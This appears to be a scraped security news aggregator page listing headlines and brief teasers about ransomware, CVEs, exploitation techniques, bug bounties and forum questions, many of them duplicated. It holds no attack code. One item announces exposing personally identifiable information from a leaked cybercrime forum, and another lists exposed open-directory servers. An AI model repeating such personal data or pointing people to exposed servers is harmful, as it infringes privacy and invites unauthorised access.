    安全研究人员发现,在部署有效载荷之前,一家受到LockBit勒索软件攻击的美国地区政府机构被该勒索软件团伙潜藏在其网络中至少5个月。
    惠普 Teradici PCoIP 受漏洞影响, 波及 1500  万个端点
    Teradici 受到最近披露的OpenSSL证书解析漏洞影响,该漏洞导致无限拒绝服务循环。
    Imperva最新报告,消费者对数据泄露风险日益麻木
    根据Imperva的最新研究,消费者对与他们开展业务的企业的信任处于最低点,导致许多人“放弃”安全性。
    记一次数据包解签名实战
    本文主要介绍寻找签名算法和实现自动化签名的过程。
    暗网市场 RaidForums被一锅端了
    在执法行动中,年仅21岁的RaidForums创始人兼首席行政官亦被逮捕。
    基于机器学习的自动化网络流量分析
    本文关注通用的自动化网络流量分析问题,致力于使研究人员将更多的精力用于优化模型和特征上。
  • Open

    Microsoft patches zero-day RCE vulnerability with CVE score of 9.8
    Article URL: https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/ Comments URL: https://news.ycombinator.com/item?id=31012226 Points: 1 # Comments: 0
  • Open

    余弦:区块链黑暗森林自救手册
    作者:慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/A2XQEWlH25o8YsWjwCz2HQ 前言 区块链是个伟大的发明,它带来了某些生产关系的变革,让「信任」这种宝贵的东西得以部分解决。但,现实是残酷的,人们对区块链的理解会存在许多误区。这些误区导致了坏人轻易钻了空子,频繁将黑手伸进了人们的钱包,造成了大量的资金损失。这早已是黑暗森林。 基于此,慢雾科技...
  • Open

    余弦:区块链黑暗森林自救手册
    作者:慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/A2XQEWlH25o8YsWjwCz2HQ 前言 区块链是个伟大的发明,它带来了某些生产关系的变革,让「信任」这种宝贵的东西得以部分解决。但,现实是残酷的,人们对区块链的理解会存在许多误区。这些误区导致了坏人轻易钻了空子,频繁将黑手伸进了人们的钱包,造成了大量的资金损失。这早已是黑暗森林。 基于此,慢雾科技...
  • Open

    JTAG/Chip-Off Resources
    Hi community… I’m wondering if I can make a DIY lab for JTAG/Chip-Off but stuck at what needs to be the minimum items to have to perform JTAG/Chip-Off … JTAG/Chip-Off is quite similar to Hardware Reverse Engineering … so what would be the useful resources to get started with … Any mentioned article or book or tools would do great … Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Exposing Personally Identifiable Information Behind A Recently Leaked Russian High-Profile Cybercriminal Forum Community - An Analysis
    I've decided to share some personally identifiable information behind a recently leaked high-profile Russian cybercrime-friendly forum community with the idea to assist everyone in their current and future cyber attack or cyber campaign attribution efforts.Sample personally identifiable information courtesy of a recently leaked high-profile Russian cybercrime-friendly forum community:djamix@
    It's Full of Secrets and User-Generated Sensitive and Classified Information - An Update on Some Current Projects
    It used to be a moment when "rocking the boat" while travelling was a monthly routine and when sticking to the basic methodology that "sharing is caring" and that "if it's going to be massive it better be good" was the everyday mentality for a new generation of baby boomers who would eventually end up inspiring the next generation Y which is by the way a secret that you should be extremely

  • Open

    Blue team scripts you use on red team engagements?
    I feel like I could do better at reports for clients. Besides shots of hash dumps, cracks, shares, AD trees, etc, I like to run winpeas and screenshot it, but the output is a little long for screenshots. Can anyone recommend any good blue team scripts that offer good output for reports? submitted by /u/hpliferaft [link] [comments]
    Tired of SANS. Any other good training/certification programs?
    I have 7 SANS certs (1 a year) and I get unlimited cloud vendor training/cert attempts from my employer. Any suggestions for non-SANS, and non-Azure/AWS training? submitted by /u/m0lware [link] [comments]
    Are Java updates cumulative from a security standpoint ?
    Hello allo, sysadmin trying to learn some basic security here. Currently am looking at this CVEdetails page on Java vulns, it mentions Java 8 update 311 is vulnerable to a specific vuln. ​ My question is, would java 8u301 be vulnerable as well ? My understanding is: CVEdetails, various advisories and Oracle themselves never explicitly mention that other v8 updates are affected But maybe it's because Java updates fundamentally always are backwards-compatible so it's basically a fundamental given and I missed this info ? ​ I know vuln scans exist and Wazuh,greenbone and openCVE all return simply nothing on this soft but we all know vuln scans are not the perfect holy grail either, I'd rather just know how the hell Oracle approches this. Maybe this better fits r/AskProgramming but since it's more specifically on the security side I start here. ​ Thanks for any answers. submitted by /u/YetAnotherSysadmin58 [link] [comments]
    Open Source tool for code/data leakage
    I'm looking to find open source tools (or low-cost) that can scan common places on the internet where people might upload my company's data accidentally or maliciously. I'm interested in scanning places like github/bitbucket/etc for code, as well as pastebin/other random sites for bulk data. I haven't gotten much farther than google dorks and github searches thus far. Any good tools out there? submitted by /u/tophersmith [link] [comments]
    network forensic analysis challenge
    Hi, I am looking for some Network forensic challenges/puzzles, like getting a .pcap file and try to determine what happened or from which IP and so on.. I founded netresec.com. Lots of pcap there, specially about the MACCDC competitions, but it is not clear to me WHAT is the "challenge", or even if there is one, I mean maybe they provide very realistic pcap files and it is necessary to understand what happened on the wire without any clue at all. any other suggestion? thank you! submitted by /u/g-simon [link] [comments]
    IT Consultant to CyberSecurity Field?
    I am an IT management consultant at one of the biggest shops in the world. Think tier 2.. I am currently an entry level MC working as a trainer with a govt focused cloud architecture. I have close to two years of experience in the field and want to know my prospects for transitioning in the Cyber Security Field; and what types of roles are available to someone transitioning from IT Management Consulting? submitted by /u/nyulspboy [link] [comments]
    Can a webpage access any part of an extension from the browser?
    For example, LastPass the browser extension has the user log in with their master password in the extension window, which can have any webpage loaded in the browser at the same time. Is it possible for a malicious webpage to be able to interact with the extension such that it can read what is being input? What ability if any do web pages have to access extensions in the browser? Is it one way? i.e. Extensions can affect a webpage but not the other way around? Or is the extension model included in the DOM items that a webpage can interact with? submitted by /u/JamieOvechkin [link] [comments]
    No prior knowledge. No It backgroud. About 3 years to learn. Too much to dream?
    So, basically... is it worth pursuing the bug bounty path? I am looking for a side hustle (maybe one day a full job?) and I have around 3 years to spare while maintaining my actual job. Is it feasible? Or would you choose another thing to pursue? *same question asked in the bb subreddit. submitted by /u/_sephi_ [link] [comments]
  • Open

    Earning $$$ without any hacking, Most interesting OTP Bypass
    Want to see how i managed to get OTP Bypass without any hacking ? Give it a shot and read my story! Continue reading on Medium »
    Earning $$$ without any hacking, Most interesting OTP Bypass
    Want to see how i managed to get OTP Bypass without any hacking ? Give it a shot and read my story! Continue reading on InfoSec Write-ups »
    Compromise domain with NoPac exploit
    During the last pentesting in client infra, we compromised a domain with CVE-2021–42287/CVE-2021–42278(noPac) exploits. Continue reading on Medium »
    Euler запускає програму ImmuneFi Bug Bounty на суму 1 мільйон доларів!
    Програма ImmuneFi Bug Bounty має на меті посилити безпеку Euler, одночасно посилюючи співпрацю з більшою екосистемою DeFi в рамках нашого… Continue reading on Medium »
    Broken session control leads to access the admin panel even after revoking the access!! — #ZOHO
    Hey Guy’s Continue reading on Medium »
    CVE-2021–4034
    CVE-2021–4034 Local privilege escalation Continue reading on Medium »
    AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 3
    Hello Medium folk, I hope you enjoyed our previous articles, so now on this article You’ll learn about Types of Cross-Site-Scripting… Continue reading on Medium »
    Nexus Mutual Community Renews Bounty Matching Program With $600k War Chest
    The Nexus Mutual community has just voted to continue its bug bounty matching program with Immunefi and increase the size of the war chest… Continue reading on Immunefi »
    Immunefi Matching Bug Bounty Program: Renewal and Expansion
    Nexus Mutants recently approved the renewal and expansion of the Immunefi matching bug bounty program by a unanimous vote. Funding for the… Continue reading on Nexus Mutual »
  • Open

    OSINT TOOLS 2022 THE MOST COMPREHENSIVE LIST OF SOURCES FOR THE OSINT SERVICE.
    PROJECT : ADVISOR B&M LLC (NEW PROJECT)! Continue reading on Medium »
    War in Ukraine / April 11
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    Tarrask malware uses scheduled tasks for defense evasion - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    Tarrask malware uses scheduled tasks for defense evasion
    submitted by /u/SCI_Rusher [link] [comments]
    Mythic C2 Framework Introduction Video
    Introduction To Mythic C2 - YouTube submitted by /u/luzunov [link] [comments]
    Up to 100k GitHub credentials leaked...
    submitted by /u/dmchell [link] [comments]
    Some insights into offensive security from ex Facebook red teamer
    Recently recorded this podcast with a CTO in cybersecurity (my boss) and a former offensive security engineer at Facebook (currently enterprise architect at ReliaQuest) about red teaming and offensive security. There is some interesting insight into ethical red teaming, internal vs external teams and getting the business on board with the whole process. Give it a listen if you'd like. https://open.spotify.com/episode/1BuzVj8Md3K4O7OAkuHrdM submitted by /u/AgentLessBots [link] [comments]
  • Open

    CVE-2022-22965 – Spring RCE (which does NOT impact spinnaker)
    Article URL: https://www.armory.io/blog/cve-2022-22965-spring-rce-which-does-not-impact-spinnaker/ Comments URL: https://news.ycombinator.com/item?id=31008467 Points: 2 # Comments: 0
    Git v2.35.2 and below for CVE-2022-24765
    Article URL: https://lore.kernel.org/git/xmqqv8veb5i6.fsf@gitster.g/ Comments URL: https://news.ycombinator.com/item?id=31008416 Points: 4 # Comments: 0
  • Open

    Russian Malware Targeting Ukrainian Energy Sector
    submitted by /u/entropydaemon5 [link] [comments]
    The Security Risks of Open Source Dependencies and Some npm Flaws That Leverage Them
    submitted by /u/mkatch [link] [comments]
    Round Two: An Updated Universal Deserialisation Gadget for Ruby 2.x-3.x
    submitted by /u/Gallus [link] [comments]
    CVE-2022-25165: Privilege Escalation to SYSTEM in AWS VPN Client
    submitted by /u/rhino_security_labs_ [link] [comments]
  • Open

    Process Hollowing (Mitre:T1055.012)
    Introduction In July 2011, John Leitch of autosectools.com talked about a technique he called process hollowing in his whitepaper here. Ever since then, many malware The post Process Hollowing (Mitre:T1055.012) appeared first on Hacking Articles.
    Defense Evasion: Process Hollowing (Mitre:T1055.012)
    Introduction In July 2011, John Leitch of autosectools.com talked about a technique he called process hollowing in his whitepaper here. Ever since then, many malware The post Defense Evasion: Process Hollowing (Mitre:T1055.012) appeared first on Hacking Articles.
  • Open

    Process Hollowing (Mitre:T1055.012)
    Introduction In July 2011, John Leitch of autosectools.com talked about a technique he called process hollowing in his whitepaper here. Ever since then, many malware The post Process Hollowing (Mitre:T1055.012) appeared first on Hacking Articles.
    Defense Evasion: Process Hollowing (Mitre:T1055.012)
    Introduction In July 2011, John Leitch of autosectools.com talked about a technique he called process hollowing in his whitepaper here. Ever since then, many malware The post Defense Evasion: Process Hollowing (Mitre:T1055.012) appeared first on Hacking Articles.
  • Open

    Git Security Vulnerability Announced
    Article URL: https://github.blog/2022-04-12-git-security-vulnerability-announced/ Comments URL: https://news.ycombinator.com/item?id=31006060 Points: 34 # Comments: 11
  • Open

    SecWiki News 2022-04-12 Review
    区块链黑暗森林自救手册 by ourren 从零开始,分析Spring Framework RCE by ourren OLa:一款CS后渗透模块插件 by ourren 美国网络安全意识教育举措概述 by ourren DecoyMini: 智能仿真与攻击诱捕工具 by ourren 等保、分保、关保、密评四道防线守护网络信息安全 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-12 Review
    区块链黑暗森林自救手册 by ourren 从零开始,分析Spring Framework RCE by ourren OLa:一款CS后渗透模块插件 by ourren 美国网络安全意识教育举措概述 by ourren DecoyMini: 智能仿真与攻击诱捕工具 by ourren 等保、分保、关保、密评四道防线守护网络信息安全 by ourren 更多最新文章,请访问SecWiki
  • Open

    Understanding and Defending Against Reflective Code Loading on macOS
    This blogpost will describe the concept of loading executables in-memory on macOS and how to detect it. Continue reading on Medium »
    Home-Grown Red Team: Internal Windows Phishing With Pickl3 And InsideMan
    Let’s assume that you’ve sent your phishing email, found an external RCE exploit that led to internal network access, or whatever method… Continue reading on Medium »
    CrowSec EdTech Write-Up: Poisoning
    In this article, I will demonstrate how to resolve this CTF (Capture the Flag), this challenge is a lab and is available in the CrowSec… Continue reading on Medium »
  • Open

    I made a subreddit for FTP Open Directories.
    I made one so there wouldn't need to be any FTP sites here. ​ r/OpenFTP submitted by /u/ilikemacsalot [link] [comments]
    Notes, Assignments, Question Papers and Study Materials from VMOU (India) [English + Hindi]
    A lot of Study materials, Question papers, Assignments from VMO University, India. Probably left Open on Purpose for students, thus anyone can access. Majority of the content is in Hindi, as well as English, on multiple Subjects/Fields. http://assets.vmou.ac.in/ submitted by /u/amritajaatak [link] [comments]
    Minecraft Mod OD ? (I’m not sure
    Mod for Minecraft kind of interesting OD if anyone wants to try this mod please say if it’s good or not ;) Have fun! https://www.csse.canterbury.ac.nz/greg.ewing/minecraft/mods/SGCraft/doc/Programs/ submitted by /u/Salty_Ad_69 [link] [comments]
    LLOD 04-12-22 (Large List Of Open Directories)
    http://dev.stoneybrooke.com/ https://packages.bic.mni.mcgill.ca/ https://opensource.wandisco.com/ https://www.song.ac.th/song_web58/images/ http://188.165.227.112/ http://www.figuresworld.net/movies_tv/ http://www.cs.cmu.edu/afs/cs/Web/People/libra-demo/ http://www.frontiernet.net/~mardenz/ http://nerfhaven.com/forums/public/style_avatars/ http://tee.tucows.com/ http://tee.linux.tucows.com/ http://www.jeepwrangler.net/ http://ftp.cs.stanford.edu/ http://www.danslagle.com/mac/ http://www.danslagle.com/mac/iMovie/data/ http://www.healthfreedomusa.org/downloads/iMovie.app/ http://www.sfu.ca/~bvaid/ http://test.scripts.psu.edu/users/ http://brbfinanzag.ch/ http://ftpmirror.your.org/ http://ftpmirror.your.org/pub/misc/apple/ https://www.life.illinois.edu/ming/iWeb.app/ http://202.74.40.12/ http://mail.i-sams.com/ ​ Pastebin of both LLODs: https://pastebin.com/QtuNUVry Also don't look at this: http://www.frontiernet.net/~mardenz/Shrek/Shrek.svg submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Counter XSS with Spring Cloud Gateway
    Prerequisites Continue reading on System Weakness »
    Counter XSS with Spring Cloud Gateway
    Prerequisites Continue reading on Medium »
  • Open

    ZAP HUNT Remix
    제가 오랬동안 잘 써오던 도구가 있었습니다. 바로 HUNT인데요! 저 또한 분석하는 방법 중 Data Driven Testing을 선호하는 편이라 HUNT 스크립트를 정말 잘 쓰고 있었습니다. 그러던 중 HUNT Remix라고 하여 ZAP, Burpsuite 에서의 기존 스크립트 방식을 Addon 형태로 변경하는 작업이 있는걸 알게 되었고 저도 이제 HUNT 사용을 AdoOn 형태로 변경하였습니다. 오늘은 HUNT가 뭔지 간략하게 설명드리고, Remix 버전의 Addon을 설치하고 사용하는 방법에 대해 이야기드릴까 합니다. HUNT+DDT 제가 2018년도에 한번 소개해드렸던 도구로 Jason Haddix 가 DEFCON 25에서 발표했던 내용을 위한 도구입니다.
  • Open

    A brief look at Windows telemetry: CIT aka Customer Interaction Tracker - a source of forensic data on at least Windows version till 7
    submitted by /u/digicat [link] [comments]
    Cellbrite free alternatives?
    Hi everyone, is there any free (and hopefully open source) alternative to Cellbrite for Mobile Forensics? submitted by /u/zr0_day [link] [comments]
    A small advice for a first DFIR setup
    I've gotten a lot of questions about my setup for digital forensics and incident response in the last several months, so I decided to start my blog with an article on it. Suggestions and enhancements are always appreciated. https://www.dfirblog.com/yet-another-setup-for-dfir-investigations/ submitted by /u/samaritan_o [link] [comments]
    BSSID and Cell ID values offline database for PA
    Hello, sometimes online Enrichment of BSSID and cell IDs from PA (versions 7.49, and 7.54) fails to me. Does anybody have the full DB for doing this offline, to download it? Also, does anybody know how to use open databases as ALEXANDER MYLNIKOV´s databases or RADIOCELLS.ORG ones? Thanks submitted by /u/PaleAbbreviations648 [link] [comments]
  • Open

    Regular Expression Denial of Service vulnerability
    Reddit disclosed a bug submitted by dingleberryfarts: https://hackerone.com/reports/1538157
    RCE via WikiCloth markdown rendering if the `rubyluabridge` gem is installed
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1401444 - Bounty: $3000
  • Open

    IAM Your Defense Against Cloud Threats: The Latest Unit 42 Cloud Threat Research
    We present research highlights and recommendations for defense against cloud threats from Unit 42’s Cloud Threat Report: IAM the First Line of Defense The post IAM Your Defense Against Cloud Threats: The Latest Unit 42 Cloud Threat Research appeared first on Unit42.
  • Open

    FreeBuf早报 | 开源社区提倡加强路由安全性;新加坡实施严格的网络安全许可证制度
    联邦通信委员会应考虑实施全面测试和罚款,以确保互联网服务提供商采取最少的措施来保护全球互联网路由系统免受恶意攻击。
    恶意软件Mirai正积极利用Spring4Shell漏洞
    近日,有研究显示,Mirai恶意软件正在利用Spring4Shell漏洞感染易受攻击的web服务器,并进行DDoS(分布式拒绝服务)攻击。
    福克斯新闻在线曝光 1300 万条敏感记录
    暴露数据中包含大约 1300 万条网络内容管理记录,互联网用户可以随时访问。
    美国VA增加超1亿的网络安全预算,着重落地零信任
    VA要求在2023财年增加超过1亿美元的网络安全预算,并且将特别关注实施零信任预防措施和安全体系。
    匿名者黑客组织入侵俄罗斯文化部并泄露446GB数据
    黑客组织Anonymous入侵了俄罗斯文化部,并通过DDoSecrets平台泄露了来源于文化部的446 GB数据。
    FreeBuf早报 | 微博等多平台公告打击涉疫谣言;开源平台npm抵制俄罗斯开发者
    多家商业网站平台发布公告,对相关违法违规信息及账号进行严肃处置。
  • Open

    DeFi Hack 通关学习
    作者:0x9k 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 DeFi Hack是根据真实世界DeFi中出现的漏洞为模板,抽象而来的wargame。用以提高学习者挖掘、利用DeFi智能合约漏洞的技能[1]。 May The Force Be With You 题目描述 本关目标是从MayTheForceB...
  • Open

    DeFi Hack 通关学习
    作者:0x9k 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 DeFi Hack是根据真实世界DeFi中出现的漏洞为模板,抽象而来的wargame。用以提高学习者挖掘、利用DeFi智能合约漏洞的技能[1]。 May The Force Be With You 题目描述 本关目标是从MayTheForceB...
  • Open

    Deconstructing Programs for Compiler Fuzzing
    Article URL: https://comby.dev/blog/2022/04/11/comby-decomposer-compiler-fuzzing Comments URL: https://news.ycombinator.com/item?id=30998620 Points: 7 # Comments: 0

  • Open

    [Python]: Add Server-side Request Forgery sinks
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1538144
  • Open

    Burp Suite functionality... But in a web browser?
    Is this a thing? I can't install things on my work laptop and some time I just want to check what HTTPS is doing. submitted by /u/pooshitfartcoomer [link] [comments]
    BurpSuite Vuln Help
    Performed a scan using BurpSuite on an app where I work. Got this and not sure what the actual impact is? External Service Interaction (DNS) alert. Port swigger documentation doesn't help. submitted by /u/DoctorPaxel [link] [comments]
    Remote pentesting with a team
    What’s the best way to run a remote pentest where we send a host to the client and have multiple people accessing the host? In the past I’ve used VMware shared devices but that is now depreciated. Any thoughts? Thanks! submitted by /u/yeahivapebro [link] [comments]
    What could be the reason why an SSH server would return back a high byte packet back to a malicious public ip?
    Srcport was 22 and the destport was a high number. But the bytes sent was about 1140 bytes. I have experimented myself before and a failed ssh login normally just records about less than 50 bytes. I don't have access the the ssh logs on the server. What kind of attack will make an ssh server reply back with such a big byte size? submitted by /u/Ecstatic_Constant_63 [link] [comments]
    Decrypting (and formatting) an external HDD when you know the password?
    Hey, so I have no idea if I just bricked my HDD. I encyrpted it using Veracrypt and was able to mount it just fine, until I accidentally forgot to mount it using Veracrypt one day and right clicked on it instead, selected "format". Ever since, I haven't been able to mount it using Veracrypt. How might I go about decrypting and/or formatting it? submitted by /u/856850835 [link] [comments]
    Studying for CompTIA Security+
    Hi, Is anyone here who studied for Security+ and used https://globalcerts.training ? This site comes up everywhere on the web as an ad. submitted by /u/Dodge-Sw [link] [comments]
    Successful virtualization on M1 ARM host and cybersec Linux distros?
    Has anyone had recent success running any cybersec Linux distros as VMs on ARM-based macs? If so, which distro and which virtualization software was used? I see Kali being supported and developed, but was wondering if any others work. Thanks. submitted by /u/cho--e [link] [comments]
    suspected dns hijack, how to go about this?
    Not knowleable in netsec by any means, im studying web dev so i know the basics. i suspect my router's dns has been hijacked, think attacker is serving me a fradulent google.com. i had a shenanigan that made me suspect this, but would not rather go into details as Im trying to keep this post simple. I know it is unlikely someone would go out of their way to do this, but i want to make sure. How can i check that my gateway modem's/devices' dns have not been tampered with? I tried dnsleaktest but just my ISP's nameservers show up. Is it possible that an attacker would be able to prevent the malicious dns from showing up when doing a test like this? Thanks submitted by /u/Far-Veterinarian9464 [link] [comments]
    Phishing email detection, analysis, and response
    Have to admit Phishing email is a top security concern in the company. There are already lots of successful products such as Knowbe4, Cofense, Mimecast, etc. The email vendor has its own phishing tools/solutions, e.g. office 365 defender. I am still seeing new products coming up such as Tessian, abnormal security gaining attractions. Are they solving a new problem or are they still solving the same problem with really a break new solutions? submitted by /u/Calm_Scene [link] [comments]
  • Open

    AWS RDS Vulnerability Leads to AWS Internal Service Credentials
    Article URL: https://blog.lightspin.io/aws-rds-critical-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=30996426 Points: 3 # Comments: 0
    Access control vulnerability in EA exposed sensitive personal data
    Article URL: https://portswigger.net/daily-swig/access-control-vulnerability-in-easy-appointments-platform-exposed-sensitive-personal-data Comments URL: https://news.ycombinator.com/item?id=30991997 Points: 1 # Comments: 0
  • Open

    AWS RDS Vulnerability Leads to AWS Internal Service Credentials
    submitted by /u/freakwin [link] [comments]
    CI/CD Goat - A deliberately vulnerable CI/CD environment (CTF)
    submitted by /u/TupleType1 [link] [comments]
    Semgrep ruleset for C/C++ vulnerability research
    submitted by /u/0xdea [link] [comments]
    Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware. This is far from the first time the botnet operators have quickly added newly publicized flaws to their exploit toolset. last year, multiple botnets were uncovered leveraging the Log4Shell to breach susceptible servers.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Pythonic Malware: Evading Detection with Compiled Executables
    Creating Python executables during an offensive security engagement used to be an effective method of evasion. However, this tactic has… Continue reading on InfoSec Write-ups »
    Hacking Instagram Scammers
    No content preview
    SVG SSRFs and saga of bypasses
    Hi all, hope you are keeping well and staying safe. This blog is about my recent experiences with SVG, HTML to PDF SSRF, and bypasses for… Continue reading on InfoSec Write-ups »
    Server-Side Request Forgery (SSRF) Explained
    No content preview
    Complete Guide To Start Bug Bounty In 2022
    No content preview
    TryHackMe: Blaster
    No content preview
    THM: Attacktive Directory
    No content preview
  • Open

    Pythonic Malware: Evading Detection with Compiled Executables
    Creating Python executables during an offensive security engagement used to be an effective method of evasion. However, this tactic has… Continue reading on InfoSec Write-ups »
    Hacking Instagram Scammers
    No content preview
    SVG SSRFs and saga of bypasses
    Hi all, hope you are keeping well and staying safe. This blog is about my recent experiences with SVG, HTML to PDF SSRF, and bypasses for… Continue reading on InfoSec Write-ups »
    Server-Side Request Forgery (SSRF) Explained
    No content preview
    Complete Guide To Start Bug Bounty In 2022
    No content preview
    TryHackMe: Blaster
    No content preview
    THM: Attacktive Directory
    No content preview
  • Open

    Pythonic Malware: Evading Detection with Compiled Executables
    Creating Python executables during an offensive security engagement used to be an effective method of evasion. However, this tactic has… Continue reading on InfoSec Write-ups »
    Hacking Instagram Scammers
    No content preview
    SVG SSRFs and saga of bypasses
    Hi all, hope you are keeping well and staying safe. This blog is about my recent experiences with SVG, HTML to PDF SSRF, and bypasses for… Continue reading on InfoSec Write-ups »
    Server-Side Request Forgery (SSRF) Explained
    No content preview
    Complete Guide To Start Bug Bounty In 2022
    No content preview
    TryHackMe: Blaster
    No content preview
    THM: Attacktive Directory
    No content preview
  • Open

    A Detailed Guide on AMSI Bypass
    Introduction Windows developed the Antimalware Scan Interface (AMSI) standard that allows a developer to integrate malware defense in his application. AMSI allows an application to The post A Detailed Guide on AMSI Bypass appeared first on Hacking Articles.
  • Open

    A Detailed Guide on AMSI Bypass
    Introduction Windows developed the Antimalware Scan Interface (AMSI) standard that allows a developer to integrate malware defense in his application. AMSI allows an application to The post A Detailed Guide on AMSI Bypass appeared first on Hacking Articles.
  • Open

    Untitled
    Olá meus amigos, como vocês estão? espero que estejam bem. Continue reading on Medium »
    Euler запускает программу “баунти” ImmuneFi стоимостью $1 млн!
    Программа ImmuneFi Bug Bounty направлена на укрепление безопасности Euler, одновременно развивая сотрудничество с более широкой… Continue reading on Medium »
    Types of Steganography methods that are used for hiding confidential data.
    > Are the images really safe? Continue reading on Medium »
    Spring4Shell
    Spring4Shell and Spring Cloud RCE vulnerability Scanner Continue reading on Medium »
    [1/3] Brute-Force Protection Bypass @ GitLab
    This is the first of three reports describing my findings from a review I did of Gitlab around 6 months ago. I thought I’d start with the… Continue reading on Medium »
    SVG SSRFs and saga of bypasses
    Hi all, hope you are keeping well and staying safe. This blog is about my recent experiences with SVG, HTML to PDF SSRF, and bypasses for… Continue reading on InfoSec Write-ups »
    cilocks-android-lockscreen-bypass
    CiLocks — Android LockScreen Bypass Features Continue reading on Medium »
    pyWhat — Identify Anything. Easily Lets You Identify Emails, IP Addresses, And More…
    The easiest way to identify anything pip3 install pywhat && pywhat --help What is this? Continue reading on Medium »
    Lazyrecon — Tool To Automate Your Reconnaissance Process In An Organized Fashion
    Fashion Continue reading on Medium »
    nexfil-osint-tool-for-finding-profiles-by-username
    NExfil is an OSINT tool written in python for finding profiles by username. The provided usernames are checked on over 350 websites within… Continue reading on Medium »
  • Open

    War in Ukraine / April 10
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Identification of the WEX terrorist
    On November 28, 2019, one of the largest waves of virtual mining in Russia began… Continue reading on Medium »
    Analysis of advertising counters on websites
    Today I will talk about the study of unique advertising identifiers on the site and their applicability for use in OSINT research… Continue reading on Medium »
    Useful Chrome browser extensions
    We automate OSINT research using useful extensions for the Chrome browser. The Wayback Machine extension… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-11 Review
    以保护个人隐私为目的的软件程序及供应商列表 by 雨苁 2022年保护数字安全和隐私的300多个技巧清单 by 雨苁 SecWiki周刊(第423期) by ourren CS-Notes by ourren 智能家居平台中的缺陷API利用及其修复 by ourren 利用通信协议反向监控 C&C 服务器 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-11 Review
    以保护个人隐私为目的的软件程序及供应商列表 by 雨苁 2022年保护数字安全和隐私的300多个技巧清单 by 雨苁 SecWiki周刊(第423期) by ourren CS-Notes by ourren 智能家居平台中的缺陷API利用及其修复 by ourren 利用通信协议反向监控 C&C 服务器 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Does anyone here have experience with the EnCase CFSR?
    Doing searches I can find a lot on the ENCE but nothing on the CFSR (beside their official material) despite it being their other major cert. Anyone taken this? How does it compare to the ENCE and other similar certs? submitted by /u/Winter-Obligation276 [link] [comments]
    Windows 7 Vulnerable for MS17-010
    Hi there! ​ I am currently working with a project where I am trying to examine and verify network traffic from "EternalBlue SMB Remote Windows Kernel Pool Corruption" from Metasploit where it is exploiting the MS17-010. The problem is that I can find any Windows 7 that is vulnerable and isnt patched for it yet. Anyone have any tips and ideas? ​ Thanks! submitted by /u/Odylicous [link] [comments]
    Windows Hibernation Files - A Look Back in Time
    Good morning, It’s time for a new 13Cubed episode! I'm sure you've seen hiberfil.sys on Windows systems for years. But, how much do you really know about Windows Hibernation? We'll start with the basics and look at the original concepts behind this technology. We'll then look at how it has changed throughout the evolution of Windows, and discuss the artifact's current forensic value as of today (the "Why should I care?" part). Lastly, we'll take a look at Hibernation Recon, one of the most capable tools available to help us parse these files. Episode: https://www.youtube.com/watch?v=Kbw1sDJb61g Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed submitted by /u/13Cubed [link] [comments]
    AccessData FTK Imager - Memory Capture Failed - Cannot Start Driver
    I am running a Windows 11 VM on Parallels on my MacBook Pro 14" M1 Pro and am trying to perform a memory capture on AccessData FTK Imager 4.7.1.2 and am receiving a "Could Not Start Driver" dialog box and "Memory Capture Failed" in the Memory Progress box. I tried these things below to resolve the problem but got the same outcome: - Ran AccessData FTK Imager as administrator - Disabled driver signature enforcement through Windows admin cmd prompt - Disabled driver signature through boot up troubleshooting prompt - Enabled debug logging on FTK imager but the only thing that shows up is " [FTK Imager.cpp:271]: Imager logging initialized" after the memory capture fails. Nothing else populates the log. ​ I tried this same thing on an old 2013 MacBook Pro i5 running a Windows 10 VM on Parallels and it works, so I am assuming it has to do with the ARM drivers on my machine. submitted by /u/joshmobillybo [link] [comments]
  • Open

    Trends in Web Threats: Attackers Were More Active During Holiday Season
    We analyzed hundreds of thousands of incidents of malicious host URLs in order to identify recent trends in web threats, what they target and how. The post Trends in Web Threats: Attackers Were More Active During Holiday Season appeared first on Unit42.
  • Open

    Process Injection using CreateRemoteThread API
    submitted by /u/tbhaxor [link] [comments]
  • Open

    工信部等五部门印发《关于进一步加强新能源汽车企业安全体系建设的指导意见》
    《意见》共8章22条,第七章“健全网络安全保障体系”着重强化了网络安全方面的防护。
    黑客组织NB65用改进版的Conti勒索软件攻击俄罗斯
    据报道,黑客组织NB65通过对Conti勒索软件泄露的源代码进行改进,从而研发新的勒索软件来攻击俄罗斯。该组织自俄乌战争爆发以来,就与Anonymous黑客组织联手攻击多个俄罗斯目标,包括全俄国家电视广播公司(VGTRK)和俄罗斯航天局Roscosmos。自3月底以来,NB65黑客组织已经通过对泄露的Conti勒索软件源代码进行改进,从而研发新的勒索软件,并逐步使用该勒索软件对俄罗斯实体发起网络攻
    匿名者伙同乌克兰 IT 军团,继续攻击俄罗斯实体
    匿名者黑客组织和乌克兰 IT ARMY将继续对俄罗斯政府实体和私营企业发动网络攻击。
    Facebook 阻止了俄罗斯与白俄罗斯针对乌克兰的网络攻击
    近日,据社交网络巨头Facebook(Meta)透露,与俄罗斯相关的攻击者正试图将社交网络武器化,以打击乌克兰。
    黑客利用Spring4Shell漏洞部署Mirai恶意软件
    有安全人员发现,Spring4Shell漏洞正被攻击者大肆利用,以此执行Mirai恶意软件,部署僵尸网络。2022年4月,Mirai恶意软件开始在新加坡地区大量出现。
